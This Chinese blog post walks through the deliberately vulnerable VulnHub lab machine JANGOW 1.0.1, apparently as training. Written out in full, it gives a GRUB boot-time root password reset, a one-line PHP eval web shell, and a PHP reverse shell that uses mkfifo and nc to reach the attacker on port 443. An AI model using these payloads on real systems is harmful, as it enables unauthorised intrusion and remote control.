JANGOW: 1.0.1

最新推荐文章于 2024-08-04 07:56:44 发布
最新推荐文章于 2024-08-04 07:56:44 发布
阅读量171 收藏 5
点赞数 3
文章标签: elasticsearch 大数据 搜索引擎
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57524749/article/details/140830517
版权

jangow下载地址:https://www.vulnhub.com/entry/jangow-101,754/

修改配置

选第二行下箭头---》回车

选第二行按e进行编辑

删除"recovery nomodeset"并在末尾添加"quiet splash rw init=/bin/bash"

输入passwd修改密码

用NAT模式

编辑文件:vim /etc/network/interfaces 

(有的电脑打不了‘/’ 我们可以cd etc ,到etc下cd network ,在进行vim interfaces)

将网卡信息设置为自己的网卡

重启虚拟机查看ip

到物理机访问靶机的IP地址点Buscar

点开site文件

ulr输入whoami发现传参点

尝试上传木马文件

echo '<?php @eval($_POST["sain"]);' > 333.php

连接

写入一个php反弹shell文件(测试该靶机仅有443端口反弹shell)在本地写好蚁剑上传

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 靶机地址 443 >/tmp/f');?>  

  

kali监听443端口

nc -lvvp 443

访问123.php文件

即可反弹shell

这河狸吗.
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2668
迟到的文章,就当库存发出来吧~
Vulnhub——JANGOW: 1.0.1
weixin_46038704的博客
06-07 977
Vulnhub——JANGOW: 1.0.1
Vulnhub - JANGOW: 1.0.1
shuozhuqiu6452的博客
12-05 153
vulnhub - JANGOW: 1.0.1
vulnhub 靶机 Jangow: 1.0.1
qq_44029310的博客
06-11 2966
一次打靶记录。
vulnhub靶场,JANGOW: 1.0.1
kukudeshuo的博客
02-17 1888
vulnhub靶场,JANGOW: 1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/ 攻击机:kali(192.168.109.128) 靶机:JANGOW: 1.0.1(192.168.109.198) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:提升为root权限获取root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机
【Vulnhub靶场】JANGOW: 1.0.1
Nailaoyyds的博客
06-02 677
开局是给IP的 二、web渗透 但是只能查看文件,并不能登录。需要进行下一步操作 翻找敏感文件
vulnhub靶场Jangow: 1.0.1
nightwindnw的博客
01-09 278
闲得无聊,好久没做题了。去vulnhub发现21年好多没做过。找了个Jangow: 1.0.1做做,以此记录……
vlunhub靶机之JANGOW:1.0.1
hanjinming110的博客
03-11 172
vlunhub系列之JANGOW
VulnHub_Jangow: 1.0.1
qq_45434762的博客
04-16 619
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关主机信息kali:192.168.31.9 BreakOut:192.168.31.227信息收集使用nmap探测目标主机端口2个端口,一个FTP,一个http80端口网站打开...
解决Missing artifact javax.transaction:jta:jar:1.0.1B
12-12
1. 解压文件得到:jta-1_0_1B-classes.zip 2. cmd进入zip文件所在目录 ...mvn install:install-file -Dfile=./jta-1_0_1B-classes.zip -DgroupId=javax.transaction -DartifactId=jta -Dversion=1.0.1B -Dpackaging=jar
mq-msgpush-sdk-1.0.1.jar
05-24
《mq-msgpush-sdk-1.0.1.jar:消息推送SDK详解及应用实践》 在IT行业中,消息推送服务已经成为应用程序与用户互动的关键组件。mq-msgpush-sdk-1.0.1.jar是一个专用于消息推送的Java软件开发工具包(SDK),它允许...
emas-services-1.0.1.jar
09-17
<!... ... <artifactId>emas-services <version>1.0.1 mvn install:install-file -DgroupId=com.aliyun.ams -DartifactId=emas-services -Dversion=1.0.1 -Dpackaging=jar -Dfile=F:\jars\emas-services-1.0.1.jar
geronimo-j2ee-management_1.1_spec-1.0.1-API文档-中文版.zip
04-08
赠送jar包:geronimo-j2ee-management_1.1_spec-1.0.1.jar; 赠送原API文档:geronimo-j2ee-management_1.1_spec-1.0.1-javadoc.jar; 赠送源代码:geronimo-j2ee-management_1.1_spec-1.0.1-sources.jar; 包含...
jangow-01-1.0.1
01-19
vulnhub的靶机jangow-01-1.0.1 Description Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-...
谷粒商城实战笔记-119~121-全文检索-ElasticSearch-mapping
epitomizelu的专栏
08-03 759
首先移除旧索引的别名,同时为新索引指定别名,这样在通过别名访问索引数据时,实际上访问的是新索引,这个变更的过程无需更新使用索引的引用程序。字段的数据将不会被索引,因此不能被搜索,也即是这个字段不能作为搜索条件。索引就像是MySQL等关系数据库的表一样,而表是有表结构的,表结构有字段名词和自动类型组成。但我们要修改一个已经存在的索引的mapping时,可用使用如下方式。:这是映射定义中的一个关键部分,它包含了索引中所有字段的定义。当然,前提是旧索引有别名,且应用程序使用的是别名。:指定字段的数据类型。
Elasticsearch 的DSL查询,聚合查询与多维度数据统计
最新发布
t194978的博客
08-04 723
以上两个概念后是理解下面实验的基础,如果是传统关系数据库mysql、oracle等存储的数据,也可以搜索和聚合,但是在数据聚合分析一块,毕竟不是它们的强项,而且需要在程序中做大量的处理,耗时费力,尤其是大数据量的情况下就有些力不从心了。在一个aggs执行的bucket操作(terms),平级的json结构下,再加一个aggs,这个第二个aggs内部,同样取个名字,执行一个metric操作,avg,对之前的每个bucket中的数据的指定的field、price。
Elasticsearch的DSL查询,分组后排序,并查询组数量
t194978的博客
08-04 264
Elasticsearch分组后,根据分组后的数量排序,并查询分组后的组数量,通过DSL和java API两种方式。
Git基础:使用指南
Hello World
08-02 777
使用命令git init,初始化Git仓库使用命令,可反复多次使用,添加多个文件使用命令完成提交使用命令git status,查看工作区状态如果git status告诉你有文件被修改过,用git diff可以查看修改内容HEAD指向当前版本,使用命令可以切换版本穿梭前,用git log可以查看提交历史,以便确定要回退到哪个版本要重返未来,用git reflog查看命令历史,以便确定要回到未来的哪个版本每次修改,如果不用git add到暂存区,那就不会加入到commit中。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值